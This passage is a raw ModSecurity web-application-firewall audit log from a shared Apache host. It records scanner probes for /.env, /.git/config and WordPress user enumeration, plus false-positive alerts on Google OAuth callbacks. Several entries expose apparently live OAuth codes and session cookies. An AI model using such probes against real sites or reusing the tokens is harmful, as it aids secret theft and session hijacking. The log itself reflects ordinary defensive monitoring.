p1=553, p2=2183, p3=0, p4=0, p5=130, sr=137, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --470fda34-Z-- --c6628a31-A-- [24/Jul/2025:16:03:31.569349 +0300] aIIvI_FbyHsjieS2RGCFLQAAAMM 43.134.59.40 41966 127.0.0.1 7081 --c6628a31-B-- GET /.env HTTP/1.0 Host: hamomohsen.net X-Real-IP: 43.134.59.40 X-Accel-Internal: /internal-nginx-static-location Connection: close --c6628a31-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --c6628a31-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "hamomohsen.net"] [uri "/.env"] [unique_id "aIIvI_FbyHsjieS2RGCFLQAAAMM"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: PHP Request Startup: open_basedir restriction in effect. File(/var/cpanel/php/sessions/ea-php82) is not within the allowed path(s): (/var/www/vhosts/hamomohsen.net/:/tmp/) in Unknown on line 0' Apache-Handler: proxy:unix:/var/www/vhosts/system/hamomohsen.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753362211333956 235498 (- - -) Stopwatch2: 1753362211333956 235498; combined=2847, p1=668, p2=2038, p3=0, p4=0, p5=141, sr=174, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c6628a31-Z-- --5e4c681e-A-- [24/Jul/2025:16:27:35.183556 +0300] aII0wfFbyHsjieS2RGCq7AAAANU 178.135.22.222 39326 127.0.0.1 7081 --5e4c681e-B-- GET /faculty/onlineClasses.php?code=4/0AVMBsJhmYnIjs8ATwB_0i-KNd8YXcdXKtNrGtkvR9ckEm7-rOBmeN1uzA2zWKNmlxh63LA&scope=email%20profile%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/gmail.readonly%20https://www.googleapis.com/auth/calendar.readonly%20https://www.googleapis.com/auth/classroom.courses.readonly%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 178.135.22.222 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=emrlm9bcohk7o77cvj67ae32l3 --5e4c681e-F-- HTTP/1.1 200 OK Expires: Mon, 16 Jul 1981 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 7921 Content-Type: text/html; charset=UTF-8 --5e4c681e-E-- --5e4c681e-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/gmail.readonly https:/www.googleapis.com/auth/calendar.readonly https:/www.googleapis.com/auth/classroom.courses.readonly https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/gmail.readonly https:/www.googleapis.com/auth/calendar.readonly https:/www.googleapis.com/auth/classroom.courses.readonly https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/faculty/onlineClasses.php"] [unique_id "aII0wfFbyHsjieS2RGCq7AAAANU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753363649610687 5573079 (- - -) Stopwatch2: 1753363649610687 5573079; combined=7323, p1=734, p2=6235, p3=121, p4=126, p5=106, sr=170, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5e4c681e-Z-- --be92155c-A-- [24/Jul/2025:16:29:42.473127 +0300] aII1RvFbyHsjieS2RGCtpAAAAMI 78.40.176.204 40710 127.0.0.1 7081 --be92155c-B-- GET /administration/index.php?code=4/0AVMBsJhiidX4Gjp8FQ3G6MZvNpawOjG3igjTHrzyNUOrHPE_IHeHjuMUP_eSwapwPuwOcA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 78.40.176.204 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?1 sec-ch-ua-platform: "Android" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8,tr;q=0.7 priority: u=0, i cookie: PHPSESSID=qnpjtmho60u7s7j47vav9pq733 --be92155c-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --be92155c-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aII1RvFbyHsjieS2RGCtpAAAAMI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753363782058333 415002 (- - -) Stopwatch2: 1753363782058333 415002; combined=4286, p1=519, p2=3405, p3=150, p4=63, p5=149, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --be92155c-Z-- --3456867b-A-- [24/Jul/2025:16:32:32.073725 +0300] aII18PFbyHsjieS2RGCyiwAAAM8 93.123.109.64 45354 127.0.0.1 7081 --3456867b-B-- GET /.git/config HTTP/1.0 Host: train.jac.group X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; POCO F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --3456867b-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "328-5dfc34833fcce" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --3456867b-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "train.jac.group"] [uri "/.git/config"] [unique_id "aII18PFbyHsjieS2RGCyiwAAAM8"] Stopwatch: 1753363952068071 5793 (- - -) Stopwatch2: 1753363952068071 5793; combined=3561, p1=717, p2=2754, p3=0, p4=0, p5=90, sr=172, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3456867b-Z-- --45788d2c-A-- [24/Jul/2025:16:33:19.574671 +0300] aII2H0Q7UIwkHXYqnpx_NQAAAAI 111.225.148.161 38488 127.0.0.1 7081 --45788d2c-B-- GET /web/css/bootstrap.min.css HTTP/1.0 Host: hamomohsen.net X-Real-IP: 111.225.148.161 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: text/css,*/*;q=0.1 accept-language: zh,zh-CN;q=0.9 user-agent: Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/) sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: style referer: https://hamomohsen.net/ accept-encoding: gzip, deflate, br cookie: XSRF-TOKEN=eyJpdiI6IkpXV0FRWnhjZFhEY1MzNGVtZGxDU1E9PSIsInZhbHVlIjoiaUJUM3Q5czNnSHRRWHJUa1JDbUhTcnU2QldGeUtVaG8zQ013VGVDd1VITlFNVE5CWFpUQ1R3aUJkOVI5aFJBUUFiRUNxQU1EcmFxVzgvclJFZEZ4MGpiRUF5OVlRZXBUR3lJWWIvVE1TWVBhNkIzVDFzY2NDRk1TdGFhNXdkeE8iLCJtYWMiOiJmNjYyMTVlZDI2YjNkMThkYTczZDhlOTMzNDdkMjUxZGEwZjQ5Njk3ZDhhMWY1NDYwNGQ3Mjg5ZDJlZDI2MWUwIiwidGFnIjoiIn0%3D; hamo_session=eyJpdiI6IkNlOVhmQmdxaXhWdVBjKzIyUDJrZEE9PSIsInZhbHVlIjoia1QxeWVNczIyL0hRdlZWamw0QlZSL1NPTmMrRUZpdWN5cCswRGYzYjRtWjViSUE1L09XQnJFWFkrM3pTRjNDVWk1K1NlYVFLUTE1UEhPN0RSUTE2cWJETzRxYmE0UThjS2dXT0lVSnV3U1pUVUVZdFJ5aVJUcFQ4R2s0b0N4MkUiLCJtYWMiOiIwMWI5ZWM4MzgyYzgyOTNmZTZlMzllNGU4MWU2ZmNiZTM0MzIxM2Q1YTBmNTkwMTBiMDYyOTlhMGY3MWY1YjkyIiwidGFnIjoiIn0%3D --45788d2c-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 22 Sep 2024 12:55:27 GMT ETag: "38df4-622b4c94d2dc0-gzip" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 31252 Content-Type: text/css --45788d2c-H-- Message: collections_remove_stale: Failed deleting collection (name "ip", key "185.81.141.134_ece0c197c9582ea84a1fcea254616c0ed2846872"): Internal error (specific information not available) Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "185.81.141.134_ece0c197c9582ea84a1fcea254616c0ed2846872"): Internal error (specific information not available) [hostname "hamomohsen.net"] [uri "/public/web/css/bootstrap.min.css"] [unique_id "aII2H0Q7UIwkHXYqnpx_NQAAAAI"] Stopwatch: 1753363999479300 95556 (- - -) Stopwatch2: 1753363999479300 95556; combined=168255, p1=482, p2=3184, p3=0, p4=0, p5=82336, sr=144, sw=0, l=0, gc=82253 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --45788d2c-Z-- --a01ad34d-A-- [24/Jul/2025:16:40:59.896093 +0300] aII360Q7UIwkHXYqnpyERAAAAAY 152.42.245.245 34120 127.0.0.1 7081 --a01ad34d-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: first-builders.com X-Real-IP: 152.42.245.245 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --a01ad34d-F-- HTTP/1.1 503 Service Unavailable X-Powered-By: PHP/8.3.23 Retry-After: 600 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=utf-8 --a01ad34d-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||first-builders.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||first-builders.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "first-builders.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aII360Q7UIwkHXYqnpyERAAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/first-builders.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753364459886591 9574 (- - -) Stopwatch2: 1753364459886591 9574; combined=2673, p1=560, p2=2017, p3=0, p4=0, p5=95, sr=216, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a01ad34d-Z-- --a902da73-A-- [24/Jul/2025:16:42:06.395563 +0300] aII4LfFbyHsjieS2RGDAXwAAAMA 78.40.176.204 37816 127.0.0.1 7081 --a902da73-B-- GET /administration/index.php?code=4/0AVMBsJgQXjwIlAUlF5X4XwbxebslDZdE7qkrQe9kWxvbG6W55sC7tsKt69TY6_zpJP8ONg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 78.40.176.204 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?1 sec-ch-ua-platform: "Android" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8,tr;q=0.7 priority: u=0, i cookie: PHPSESSID=mh7hs6ti3o3n94aimdbi68c913 --a902da73-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --a902da73-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aII4LfFbyHsjieS2RGDAXwAAAMA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753364525983229 412471 (- - -) Stopwatch2: 1753364525983229 412471; combined=4409, p1=547, p2=3558, p3=139, p4=61, p5=104, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a902da73-Z-- --79001b5d-A-- [24/Jul/2025:16:46:54.064368 +0300] aII5TkQ7UIwkHXYqnpyIGAAAAAc 213.136.84.241 38184 127.0.0.1 7081 --79001b5d-B-- GET /.git/config HTTP/1.0 Host: haddadjewellery.com X-Real-IP: 213.136.84.241 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/113.0 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --79001b5d-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 21 Jan 2025 14:39:31 GMT ETag: "328-62c38584f0049" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --79001b5d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "haddadjewellery.com"] [uri "/.git/config"] [unique_id "aII5TkQ7UIwkHXYqnpyIGAAAAAc"] Stopwatch: 1753364814060422 4032 (- - -) Stopwatch2: 1753364814060422 4032; combined=2343, p1=534, p2=1743, p3=0, p4=0, p5=66, sr=173, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --79001b5d-Z-- --fb21a034-A-- [24/Jul/2025:16:51:42.223858 +0300] aII6bfFbyHsjieS2RGDPPwAAANE 18.236.104.120 59670 127.0.0.1 7081 --fb21a034-B-- GET /.git/config HTTP/1.0 Host: glamileaclinics.com X-Real-IP: 18.236.104.120 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 9; en-US; RMX1851 Build/PKQ1.190101.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.12.8.1206 Mobile Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --fb21a034-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --fb21a034-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "glamileaclinics.com"] [uri "/.git/config"] [unique_id "aII6bfFbyHsjieS2RGDPPwAAANE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/glamileaclinics.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753365101894796 329249 (- - -) Stopwatch2: 1753365101894796 329249; combined=2486, p1=501, p2=1885, p3=0, p4=0, p5=100, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fb21a034-Z-- --76fe5930-A-- [24/Jul/2025:16:52:23.303889 +0300] aII6lvFbyHsjieS2RGDQiAAAANQ 78.40.176.204 48290 127.0.0.1 7081 --76fe5930-B-- GET /administration/index.php?code=4/0AVMBsJgsoH6W59xCa83QctZa5UiCRRXEDqd5oX-ucndfbqzOy_9RqGYAr1UbBeJWzkc8zQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 78.40.176.204 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?1 sec-ch-ua-platform: "Android" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8,tr;q=0.7 priority: u=0, i cookie: PHPSESSID=rug18rjli0i7rmu27h7qkdhk46 --76fe5930-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --76fe5930-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aII6lvFbyHsjieS2RGDQiAAAANQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753365142842945 461167 (- - -) Stopwatch2: 1753365142842945 461167; combined=5620, p1=720, p2=4464, p3=191, p4=68, p5=176, sr=179, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --76fe5930-Z-- --ee358e5f-A-- [24/Jul/2025:17:05:13.034614 +0300] aII9mPFbyHsjieS2RGDlBQAAAMs 212.227.9.59 57286 127.0.0.1 7081 --ee358e5f-B-- GET /.git/config HTTP/1.0 Host: globalhealthgate.net X-Real-IP: 212.227.9.59 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* referer: http://globalhealthgate.net/.git/config --ee358e5f-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.23 Cache-Control: private, must-revalidate pragma: no-cache expires: -1 Set-Cookie: 